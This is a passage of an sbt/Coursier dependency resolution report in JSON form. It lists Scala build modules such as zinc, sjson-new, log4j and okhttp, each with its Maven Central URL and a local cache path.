,\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"sjson-new-core_2.12\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/com/eed3si9n/sjson-new-core_2.12/0.8.3/sjson-new-core_2.12-0.8.3.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/com/eed3si9n/sjson-new-core_2.12/0.8.3/sjson-new-core_2.12-0.8.3.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"https://github.com/eed3si9n/sjson-new\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"com.typesafe\",\"name\":\"config\",\"revision\":\"1.3.3\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"config\",\"type\":\"bundle\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/com/typesafe/config/1.3.3/config-1.3.3.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/com/typesafe/config/1.3.3/config-1.3.3.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"https://github.com/lightbend/config\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"org.scala-sbt\",\"name\":\"librarymanagement-core_2.12\",\"revision\":\"1.3.1\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"librarymanagement-core_2.12\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/org/scala-sbt/librarymanagement-core_2.12/1.3.1/librarymanagement-core_2.12-1.3.1.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/librarymanagement-core_2.12/1.3.1/librarymanagement-core_2.12-1.3.1.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"https://github.com/sbt/librarymanagement\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"org.scala-sbt\",\"name\":\"sbinary_2.12\",\"revision\":\"0.5.0\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"sbinary_2.12\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/org/scala-sbt/sbinary_2.12/0.5.0/sbinary_2.12-0.5.0.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/sbinary_2.12/0.5.0/sbinary_2.12-0.5.0.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"https://github.com/sbt/sbinary\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"com.squareup.okhttp3\",\"name\":\"okhttp-urlconnection\",\"revision\":\"3.7.0\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"okhttp-urlconnection\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/com/squareup/okhttp3/okhttp-urlconnection/3.7.0/okhttp-urlconnection-3.7.0.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/com/squareup/okhttp3/okhttp-urlconnection/3.7.0/okhttp-urlconnection-3.7.0.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"org.apache.logging.log4j\",\"name\":\"log4j-api\",\"revision\":\"2.11.2\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"log4j-api\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/org/apache/logging/log4j/log4j-api/2.11.2/log4j-api-2.11.2.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/apache/logging/log4j/log4j-api/2.11.2/log4j-api-2.11.2.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"com.squareup.okio\",\"name\":\"okio\",\"revision\":\"1.17.2\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"okio\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/com/squareup/okio/okio/1.17.2/okio-1.17.2.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/com/squareup/okio/okio/1.17.2/okio-1.17.2.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"org.scala-sbt\",\"name\":\"util-interface\",\"revision\":\"1.3.3\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"util-interface\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/org/scala-sbt/util-interface/1.3.3/util-interface-1.3.3.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/util-interface/1.3.3/util-interface-1.3.3.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"https://github.com/sbt/util\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"org.apache.logging.log4j\",\"name\":\"log4j-core\",\"revision\":\"2.11.2\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"log4j-core\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/org/apache/logging/log4j/log4j-core/2.11.2/log4j-core-2.11.2.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/apache/logging/log4j/log4j-core/2.11.2/log4j-core-2.11.2.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"org.scala-sbt\",\"name\":\"util-logging_2.12\",\"revision\":\"1.3.3\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"util-logging_2.12\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/org/scala-sbt/util-logging_2.12/1.3.3/util-logging_2.12-1.3.3.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/util-logging_2.12/1.3.3/util-logging_2.12-1.3.3.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"https://github.com/sbt/util\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"org.scala-sbt\",\"name\":\"util-tracking_2.12\",\"revision\":\"1.3.3\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"util-tracking_2.12\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/org/scala-sbt/util-tracking_2.12/1.3.3/util-tracking_2.12-1.3.3.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/util-tracking_2.12/1.3.3/util-tracking_2.12-1.3.3.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"https://github.com/sbt/util\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"com.eed3si9n\",\"name\":\"sjson-new-murmurhash_2.12\",\"revision\":\"0.8.3\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"sjson-new-murmurhash_2.12\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/com/eed3si9n/sjson-new-murmurhash_2.12/0.8.3/sjson-new-murmurhash_2.12-0.8.3.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/com/eed3si9n/sjson-new-murmurhash_2.12/0.8.3/sjson-new-murmurhash_2.12-0.8.3.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"https://github.com/eed3si9n/sjson-new\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"org.scala-sbt\",\"name\":\"compiler-bridge_2.12\",\"revision\":\"1.3.4\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"compiler-bridge_2.12\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/org/scala-sbt/compiler-bridge_2.12/1.3.4/compiler-bridge_2.12-1.3.4.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/compiler-bridge_2.12/1.3.4/compiler-bridge_2.12-1.3.4.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"https://github.com/sbt/zinc\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"org.scala-sbt\",\"name\":\"actions_2.12\",\"revision\":\"1.3.8\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"actions_2.12\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/org/scala-sbt/actions_2.12/1.3.8/actions_2.12-1.3.8.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/actions_2.12/1.3.8/actions_2.12-1.3.8.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"https://github.com/sbt/sbt\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"org.scala-sbt\",\"name\":\"scripted-sbt-redux_2.12\",\"revision\":\"1.3.8\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"scripted-sbt-redux_2.12\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/org/scala-sbt/scripted-sbt-redux_2.12/1.3.8/scripted-sbt-redux_2.12-1.3.8.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/scripted-sbt-redux_2.12/1.3.8/scripted-sbt-redux_2.12-1.3.8.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"https://github.com/sbt/sbt\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"org.scala-sbt\",\"name\":\"zinc-compile-core_2.12\",\"revision\":\"1.3.4\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"zinc-compile-core_2.12\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/org/scala-sbt/zinc-compile-core_2.12/1.3.4/zinc-compile-core_2.12-1.3.4.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/zinc-compile-core_2.12/1.3.4/zinc-compile-core_2.12-1.3.4.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"https://github.com/sbt/zinc\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"org.scala-sbt\",\"name\":\"testing_2.12\",\"revision\":\"1.3.8\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"testing_2.12\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/org/scala-sbt/testing_2.12/1.3.8/testing_2.12-1.3.8.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/testing_2.12/1.3.8/testing_2.12-1.3.8.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"https://github.com/sbt/sbt\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"org.scala-sbt\",\"name\":\"scripted-plugin_2.12\",\"revision\":\"1.3.8\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"scripted-plugin_2.12\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/org/scala-sbt/scripted-plugin_2.12/1.3.8/scripted-plugin_2.12-1.3.8.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/scripted-plugin_2.12/1.3.8/scripted-plugin_2.12-1.3.8.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"https://github.com/sbt/sbt\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"org.scala-lang\",\"name\":\"scala-library\",\"revision\":\"2.12.10\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{\"info.apiURL\":\"https://www.scala-lang.org/api/2.12.10/\"},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"scala-library\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/.sbt/boot/scala-2.12.10/lib/scala-library.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"https://www.scala-lang.org/\",\"extraAttributes\":{\"info.apiURL\":\"https://www.scala-lang.org/api/2.12.10/\"},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"org.scala-sbt\",\"name\":\"template-resolver\",\"revision\":\"0.1\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"template-resolver\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/org/scala-sbt/template-resolver/0.1/template-resolver-0.1.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/template-resolver/0.1/template-resolver-0.1.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"https://github.com/sbt/template-resolver\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"org.scala-sbt\",\"name\":\"librarymanagement-ivy_2.12\",\"revision\":\"1.3.1\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"librarymanagement-ivy_2.12\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/org/scala-sbt/librarymanagement-ivy_2.12/1.3.1/librarymanagement-ivy_2.12-1.3.1.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/librarymanagement-ivy_2.12/1.3.1/librarymanagement-ivy_2.12-1.3.1.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"https://github.com/sbt/librarymanagement\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"org.scala-sbt\",\"name\":\"zinc-lm-integration_2.12\",\"revision\":\"1.3.8\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"zinc-lm-integration_2.12\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/org/scala-sbt/zinc-lm-integration_2.12/1.3.8/zinc-lm-integration_2.12-1.3.8.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/zinc-lm-integration_2.12/1.3.8/zinc-lm-integration_2.12-1.3.8.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"https://github.com/sbt/sbt\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]}],\"details\":[]},{\"configuration\":{\"name\":\"compile-internal\"},\"modules\":[{\"module\":{\"organization\":\"org.scala-sbt\",\"name\":\"test-interface\",\"revision\":\"1.0\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"test-interface\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/org/scala-sbt/test-interface/1.0/test-interface-1.0.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/test-interface/1.0/test-interface-1.0.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"http://www.scala-sbt.org\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"com.typesafe\",\"name\":\"ssl-config-core_2.12\",\"revision\":\"0.4.0\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"ssl-config-core_2.12\",\"type\":\"bundle\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/com/typesafe/ssl-config-core_2.12/0.4.0/ssl-config-core_2.12-0.4.0.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/com/typesafe/ssl-config-core_2.12/0.4.0/ssl-config-core_2.12-0.4.0.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"https://github.com/lightbend/ssl-config\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"org.scala-sbt\",\"name\":\"io_2.12\",\"revision\":\"1.3.3\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"io_2.12\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/org/scala-sbt/io_2.12/1.3.3/io_2.12-1.3.3.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/io_2.12/1.3.3/io_2.12-1.3.3.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"https://github.com/sbt/io\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"org.scala-sbt\",\"name\":\"main_2.12\",\"revision\":\"1.3.8\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"main_2.12\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/org/scala-sbt/main_2.12/1.3.8/main_2.12-1.3.8.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/main_2.12/1.3.8/main_2.12-1.3.8.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"https://github.com/sbt/sbt\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"com.trueaccord.lenses\",\"name\":\"lenses_2.12\",\"revision\":\"0.4.12\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"lenses_2.12\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/com/trueaccord/lenses/lenses_2.12/0.4.12/lenses_2.12-0.4.12.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/com/trueaccord/lenses/lenses_2.12/0.4.12/lenses_2.12-0.4.12.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"https://github.com/trueaccord/lenses\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"org.apache.commons\",\"name\":\"commons-lang3\",\"revisio